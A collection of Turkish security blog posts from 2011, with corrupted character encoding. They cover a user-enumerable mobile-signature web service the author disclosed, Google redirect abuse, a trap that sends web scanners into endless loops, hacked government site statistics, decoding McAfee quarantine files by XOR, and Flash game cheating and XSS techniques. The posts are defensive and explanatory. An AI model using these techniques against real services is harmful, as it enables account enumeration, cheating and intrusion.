Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

